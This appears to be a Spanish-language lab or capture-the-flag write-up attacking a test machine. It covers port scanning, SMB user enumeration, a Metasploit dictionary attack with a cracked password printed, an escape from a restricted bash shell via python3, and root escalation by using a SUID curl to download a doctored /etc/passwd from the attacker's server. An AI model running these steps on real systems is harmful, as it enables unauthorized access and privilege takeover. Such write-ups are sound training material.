# Enumeracion de Puertos, Servicios y Versiones

22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.6.2
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.6.2


# enum4linux

dumpearemos toda la informacion que podemos 

========================================( Users on 172.17.0.2 )========================================

index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: smbuser	Name: smbuser	Desc: 

user:[smbuser] rid:[0x3e8]

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\smbuser (Local User)
S-1-22-1-1001 Unix User\rabol (Local User)
=======================================================================================================

asi que tenemos:
user smb: smbuser
users del sistema: rabol y smbuser

# smbmap

intente enumerar recursos compartidos pero es necesario una password, asi que aplicaremos un ataque de
diccionario con metasploit

msfconsole -q

use auxiliary/scanner/smb/smb_login
set PASS_FILE /home/darks/Desktop/linux/Kali/diccionarios/rockyou.txt
set RHOSTS 172.17.0.2
set SMBUser smbuser
[+] 172.17.0.2:445        - 172.17.0.2:445 - Success: '.\smbuser:fuckit'

ya que conseguimos la password, accederemos a los recursos compartidos nuevamente con smbmap

smbmap -u smbuser -p fuckit -H 172.17.0.2

___________________________________________________________________
	share_secret_only				READ ONLY	
-------------------------------------------------------------------

smbmap -u smbuser -p fuckit -H 172.17.0.2 -r share_secret_only

_________________________________________________________________________
	fr--r--r--               13 Mon Sep  2 08:05:04 2024	note.txt
_________________________________________________________________________

nos descargaremos el archivo txt

smbclient //172.17.0.2/share_secret_only -U smbuser%fuckit
smb: \> ls
  note.txt                            N       13  Mon Sep  2 08:05:05 2024
smb: \> get note.txt
getting file \note.txt of size 13 as note.txt (130000.0 KiloBytes/sec) (average inf KiloBytes/sec)
exit
cat note.txt
---------------------
read better
traduccion:leer mejor
---------------------

en este punto me quede buen rato chequeando desde cero a ver si pase algo por algo, pero no
consegui nada y, despues de probar todo di con que la password del user rabol por ssh es:
share_secret_only, lo que resulta ser el nombre del recurso compartido por smb

-------------------------------------------------------------------------------

# Escalada

una vez dentro del sistema al intentar ejecutar comandos, nos damos cuenta que no
podemos ejecutar casi ningun comando sino solo >> ls << al listar los archivos del
directorio me consigo con un directorio bin y un txt, al listar el contenido del 
directorio bin, contiene ls y python3, asi que tras intentar ejecutar python3, tambien
puedo ejecutarlo, por lo que para salir de la terminal -rbash que es una shell bash
restringida, ejecutare comandos de sistema a traves de python3.

python3 -c "import subprocess; subprocess.run('/bin/bash', shell=True)"

pero tras ejecutar el comando seguimos sin poder ejecutar comandos con normalidad, asi 
que vamos a establecer la variable de entorno PATH a /bin para que podamos ejecutar
todos los binarios con normalidad

export PATH=/bin				| ahora si, podremos ejecutar los binarios


find / -perm -4000 2>/dev/null
/usr/bin/curl

como tenemos curl disponible, voy a copiar el contenido de /etc/passwd
y en mi maquina atacante me creo un archivo passwd donde pego el contenido
de /etc/passwd de la maquina comprometida, modificando la primera linea
dejandola asi:

antes de modificar:	root:x:0:0:root:/root:/bin/bash
despues de modificar:	root::0:0:root:/root:/bin/bash

ahora desde mi maquina atacante levanto un servidor con python 

python3 -m http.server

luego, desde la maquina comprometida, como podemos ejecutar /usr/bin/curl como root
vamos a descargar el archivo que modificamos en la maquina atancante y guardarlo
en /etc/passwd, asi conseguimos modificar el contenido del archivo original

/usr/bin/curl http://172.17.0.1/passwd -o /etc/passwd

cat /etc/passwd |grep root
root::0:0:root:/root:/bin/bash

despues de validar los cambios, vemos que en efecto sobreescribimos el original
asi que ahora podemos escalar a root.

su root
#root
